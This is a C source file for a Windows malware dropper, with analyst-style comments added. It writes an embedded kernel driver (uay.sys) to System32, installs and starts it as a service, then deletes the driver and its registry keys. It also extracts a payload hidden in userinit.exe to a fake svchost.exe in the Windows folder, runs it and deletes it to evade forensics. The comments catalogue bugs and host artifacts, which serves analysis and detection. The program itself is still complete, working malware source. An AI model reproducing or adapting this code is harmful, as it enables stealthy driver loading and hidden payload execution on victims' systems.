#include <stdio.h>
#include <windows.h>
#include <errno.h>
#include <SYS\STAT.H>
/* Forward declarations for the stages WinMain() runs in sequence (see below). */
int ReleAseTheSys(void);
int LoAdSys(void);
int DeleteSysKey(void);
int
ReleAseTheUserinit(
char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
);
int
RunUserinitThenDeleteIt(
char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
//must be the sAme As ReleAseTheUserinit's
);
/*
 * Patch block. 'finder' is a marker value (0x12345678) that, per the
 * original comment, a separate tool searches for in the built binary so it
 * can overwrite 'file_length' in place; the source leaves it at 0.
 * ReleAseTheUserinit() uses 'file_length' as the byte offset at which the
 * appended payload is assumed to begin inside <System32>\userinit.exe.
 */
struct _MODIFY_DATA{
unsigned int finder;
unsigned int file_length;
}modify_dAtA = {0x12345678,0};//patched by another executable, which searches the binary for 0x12345678
/*
 * Entry point. Runs the stages below back to back; every return value is
 * ignored, so a failed stage does not stop the following ones.
 *   1. ReleAseTheSys()        - writes the embedded "uay"/"sys" resource to
 *                               <System32>\uay.sys
 *   2. LoAdSys()              - registers it as a kernel-driver service named
 *                               "uay.sys" and starts it
 *   3. DeleteFile + DeleteSysKey() - removes the driver file and the service's
 *                               registry keys again; no stop/unload is issued
 *   4. ReleAseTheUserinit()   - copies the tail of <System32>\userinit.exe to
 *                               <Windows>\svchost.exe (the Windows root, not
 *                               System32 where the genuine svchost.exe lives)
 *   5. RunUserinitThenDeleteIt() - executes that copy, waits, deletes it
 * Analyst note: the paths, the service name "uay.sys" and the registry keys
 * referenced here are the host-level artifacts this program creates and then
 * removes; they are short-lived on disk.
 */
int WINAPI
WinMain(
HINSTANCE hInstAnce, // handle to current instance
HINSTANCE hPrevInstAnce, // handle to previous instance
LPSTR lpCmdLine, // pointer to command line
int nCmdShow // show state of window
)
{
char syspAth[MAX_PATH+1];
char userinitpAth[MAX_PATH+1];
//driver part
ReleAseTheSys();
LoAdSys();
//delete the sys file and its registry entries (self-cleanup)
GetSystemDirectory(syspAth,MAX_PATH);
strcat(syspAth,"\\uay.sys");
DeleteFile(syspAth);
printf("DeleteFile: %d\n",GetLastError());
DeleteSysKey();
//userinit.exe part
GetWindowsDirectory(userinitpAth,MAX_PATH);
strcat(userinitpAth,"\\svchost.exe");
ReleAseTheUserinit(userinitpAth);
RunUserinitThenDeleteIt(userinitpAth);
return 0;
}
//--------------------------------------------------------------------
/*
 * Stage 1: locate the resource named "uay" of custom type "sys" in this
 * executable's own image and write its raw bytes to <System32>\uay.sys.
 * Returns 0 on success, -1 if the resource cannot be found/loaded/locked or
 * the file cannot be written.
 * Observations (behaviour as written):
 *  - SystemDir is 128 bytes; GetSystemDirectory is bounded to 128 but the
 *    "\\uay.sys" suffix is appended with an unbounded strcat, so a long
 *    system directory path overruns the buffer.
 *  - CreateFile signals failure with INVALID_HANDLE_VALUE, so the NULL test
 *    below does not catch a failed open; the following WriteFile then fails
 *    and -1 is returned.
 *  - On WriteFile failure hFile is not closed (handle leak); dwWritten is
 *    never compared against dwResSize, so a short write is reported as success.
 */
int ReleAseTheSys(void)
{
HRSRC hRes = NULL;
DWORD dwResSize = 0;
HGLOBAL hResource = NULL;
LPVOID lpfResource = NULL;
HANDLE hFile = NULL;
char SystemDir[128];//fixed-size buffer, see overrun note above
DWORD dwWritten;
DWORD result;
hRes = FindResource(NULL,"uay","sys");
if (hRes == NULL) {
return -1;
}
dwResSize = SizeofResource(NULL,hRes);
if (dwResSize == 0) {
return -1;
}
hResource = LoadResource(NULL,hRes);
if (hResource == NULL){
return -1;
}
lpfResource = LockResource(hResource);
if (lpfResource == NULL) {
return -1;
}
GetSystemDirectory(SystemDir,128);
strcat(SystemDir,"\\uay.sys");
hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if (hFile == NULL){
return -1;
}
result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);
if (result == 0){
return -1;
}
CloseHandle(hFile);
return 0;
}
//--------------------------------------------------------------------
/*
 * Stage 2: register <System32>\uay.sys with the Service Control Manager as a
 * demand-start kernel-driver service named "uay.sys" and start it.
 * Always returns 0; SCM failures are only printed, never propagated.
 * Observations:
 *  - OpenSCManager's result is never checked; a NULL manager handle would be
 *    passed straight into OpenService/CreateService.
 *  - The empty `if (hSCHAndle == NULL)` block after the first OpenService is
 *    a no-op, so DeleteService/CloseServiceHandle run on a NULL handle when
 *    no previous instance exists (the calls simply fail).
 *  - GetLastError() is printed after StartService regardless of outcome, so
 *    the printed value is only meaningful when StartService returned FALSE.
 *  - SC_MANAGER_ALL_ACCESS / SERVICE_ALL_ACCESS imply administrative rights.
 *    Creating the service produces the registry key that DeleteSysKey()
 *    later removes (HKLM\SYSTEM\CurrentControlSet\Services\uay.sys).
 */
int LoAdSys(void)
{
//create the service and load the driver
SC_HANDLE hSCHAndle;
SC_HANDLE hSCMAnAger;
char systemdir[MAX_PATH+1];
char pAth[MAX_PATH+1];
GetSystemDirectory(systemdir,MAX_PATH);
sprintf(pAth,"%s\\%s",systemdir,"uay.sys");
hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
//remove old instances (result unchecked)
hSCHAndle = OpenService(hSCMAnAger,
"uay.sys",
SERVICE_ALL_ACCESS
);
if (hSCHAndle == NULL){
//throw
//return -1;
}
DeleteService(hSCHAndle);
CloseServiceHandle(hSCHAndle);
//ignore success of installation: it may already be installed
hSCHAndle = CreateService(
hSCMAnAger,
"uay.sys",
"uay.sys",
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL,
pAth,
NULL,
NULL,
NULL,
NULL,
NULL
);
if (hSCHAndle == NULL){
printf("CreAteService error: %d\n",GetLastError());
//return -1;
}
CloseServiceHandle(hSCHAndle);
//ignore success of start: it may already be started
hSCHAndle = OpenService(hSCMAnAger,
"uay.sys",
SERVICE_ALL_ACCESS
);
if (hSCHAndle == NULL){
printf("OpenService error: %d\n",GetLastError());
//return -1;
}
StartService(hSCHAndle,0,NULL);
printf("stArtService %d\n",GetLastError());
CloseServiceHandle(hSCHAndle);
CloseServiceHandle(hSCMAnAger);
return 0;
}
//--------------------------------------------------------------------
/*
 * Stage 4: copy the data appended to <System32>\userinit.exe - everything
 * from byte offset modify_dAtA.file_length to end of file - into a new file
 * at ReleAseWhere. The parameter comment suggests a temp file under System32
 * was intended; WinMain() actually passes <Windows>\svchost.exe.
 * Returns 0 on success, -1 if either file cannot be opened.
 * Observations:
 *  - _stat's return value is unchecked; if it fails, ST.st_size is
 *    uninitialised and 'length' is indeterminate.
 *  - With file_length left at its compiled-in 0, the whole of userinit.exe
 *    is copied rather than an appended tail.
 *  - If file_length exceeds st_size the subtraction wraps (DWORD) to a huge
 *    'length'; malloc, fread and fwrite results are all unchecked.
 *  - pMyself is leaked when the second fopen fails.
 *  - "%d" is used to print a DWORD (wrong specifier, harmless on 32-bit).
 */
int
ReleAseTheUserinit(
char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
)
{
FILE* pMyself = NULL;
FILE* pUserinit = NULL;
char* buff;
DWORD length;
struct _stat ST;
char pAth_userinit[MAX_PATH+1];
GetSystemDirectory(pAth_userinit,MAX_PATH);
strcat(pAth_userinit,"\\userinit.exe");
_stat(pAth_userinit,&ST);
pMyself = fopen(pAth_userinit,"rb");
if(pMyself == NULL){
printf("open file fAiled\n");
return -1;
}
pUserinit = fopen(ReleAseWhere,"wb");
if(pUserinit == NULL){
printf("creAte file fAiled\n");
return -1;
}
//skip the first file_length bytes; the remainder is treated as the payload
fseek(pMyself,modify_dAtA.file_length,SEEK_SET);
length = ST.st_size - modify_dAtA.file_length ;
printf("length: %d\n",length);///debug
buff = malloc(length);
fread(buff,length,1,pMyself);
fwrite(buff,length,1,pUserinit);
free(buff);
fclose(pMyself);
fclose(pUserinit);
return 0;
}
//--------------------------------------------------------------------
/*
 * Stage 5: launch the file at 'where' as a child process, block until it
 * exits, then delete the file. Always returns 0.
 * Observations:
 *  - CreateProcess's return value is ignored; on failure pi.hProcess stays
 *    NULL (pi is zero-initialised), WaitForSingleObject presumably fails
 *    immediately, and the file is deleted regardless.
 *  - pi.hProcess and pi.hThread are never closed (two handle leaks).
 *  - Because the executable is removed after use, a file-system scan after
 *    the run will not find it; process-creation records are the remaining
 *    trace of its execution.
 */
int
RunUserinitThenDeleteIt(
char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
//must be the sAme As ReleAseTheUserinit's
)
{
PROCESS_INFORMATION pi={0};
STARTUPINFO si={sizeof(STARTUPINFO)};
CreateProcess(
where,//"C:\\WINDOWS\\System32\\temp_userinit.exe",
NULL,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
);
//printf("CreAteProcess: %d\n",GetLastError());
WaitForSingleObject(
pi.hProcess,
INFINITE
);
DeleteFile(where);
return 0;
}
//--------------------------------------------------------------------
/*
 * Stage 3: remove the "uay.sys" service's registry keys under
 * HKLM\SYSTEM\CurrentControlSet\Services. RegDeleteKey refuses to delete a
 * key that still has subkeys, hence the bottom-up order: Enum, Security,
 * then the service key itself. Always returns 0.
 * Observation: RegDeleteKey returns its status code directly as a LONG and
 * generally does not set the thread's last-error value, so the GetLastError()
 * printed after each call does not indicate whether that deletion succeeded.
 */
int DeleteSysKey(void)
{
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum"
);
printf("RegDeleteKey: %d\n",GetLastError());
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
);
printf("RegDeleteKey: %d\n",GetLastError());
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys"
);
printf("RegDeleteKey: %d\n",GetLastError());
return 0;
}
//--------------------------------------------------------------------